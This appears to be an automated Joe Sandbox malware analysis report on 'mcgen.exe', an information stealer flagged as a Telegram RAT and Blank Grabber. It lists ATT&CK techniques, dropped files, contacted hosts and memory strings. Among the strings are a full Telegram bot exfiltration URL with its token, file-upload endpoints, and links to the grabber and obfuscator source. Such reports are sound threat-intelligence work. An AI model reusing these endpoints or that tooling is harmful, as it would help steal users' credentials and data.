Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	4 Disable or Modify Tools	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	222 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	48 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	NTDS	251 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	11 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
mcgen.exe	44%	Virustotal		Browse
mcgen.exe	47%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ip-api.com	208.95.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
blank-q0y5l.in	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Blank-c/BlankOBF	mcgen.exe, 00000002.00000003.2141215194.000002C54E544000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141280014.000002C54E521000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2140715336.000002C54E583000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2140947833.000002C54EBE0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141430894.000002C54E540000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.avito.ru/	mcgen.exe, 00000002.00000002.2529086772.000002C54F060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Blank-c/Blank-Grabberi	mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 0000003E.00000002.2398861499.000001FC55CF0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ctrip.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.leboncoin.fr/	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://weibo.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.anonfiles.com/upload	mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://packaging.python.org/en/latest/specifications/entry-points/#file-format	mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com	mcgen.exe, 00000002.00000002.2529691866.000002C54F58F000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F148000.00000004.00001000.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.2277416389.0000020A53250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3F48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DB97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/api/v9/users/	mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cacerts.digi	mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	mcgen.exe, 00000002.00000002.2526365039.000002C54E3FE000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2127861413.000002C54E191000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	false		high
https://github.com/Blank-c/Blank-Grabberr%	mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.reddit.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000B.00000002.2207068947.0000020A431E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3DB21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ebay.co.uk/	mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000B.00000002.2207068947.0000020A4340A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ebay.de/	mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000003E.00000002.2321464313.000001FC3E755000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2144496528.000002C54E8F5000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2144379299.000002C54E955000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.mic	powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/	mcgen.exe, 00000002.00000003.2407347267.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	mcgen.exe, 00000002.00000003.2260291841.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2242671922.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://allegro.pl/	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmp	false		high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	false		high
https://MD8.mozilla.org/1/m	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata	mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.bbc.co.uk/	mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ip-api.com/line/?fields=hostingr	mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bugzilla.mo	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/wiki/Development-Methodology	mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000B.00000002.2207068947.0000020A4340A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/mail	mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/specifications/entry-points/	mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.python.org/psf/license/)	mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.iqiyi.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument0	mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://foss.heptapod.net/pypy/pypy/-/issues/3539	mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/	mcgen.exe, 00000002.00000002.2527033643.000002C54E950000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServerr	mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc7231#section-4.3.6)	mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v9/users/	mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ip-api.com/json/?fields=225545r	mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2920	mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yahoo.com/	mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.bellmedia.c	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	mcgen.exe, 00000002.00000002.2531400042.000002C54FF08000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://html.spec.whatwg.org/multipage/	mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ifeng.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.zhihu.com/	mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 0000003E.00000002.2321464313.000001FC3F289000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micft.cMicRosof	powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServer	mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583242
Start date and time:	2025-01-02 09:21:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	126
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mcgen.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@200/57@4/2
EGA Information:	Successful, ratio: 60%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 142.250.184.195, 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4072 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7524 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:22:03	API Interceptor	8x Sleep call for process: WMIC.exe modified
03:22:05	API Interceptor	143x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	intro.avi.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	ip-api.com/json
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	ip-api.com/xml
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	XClient.exe	Get hash	malicious	XWorm	Browse
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	iviewers.dll	Get hash	malicious	LummaC	Browse
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	intro.avi.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	208.95.112.1
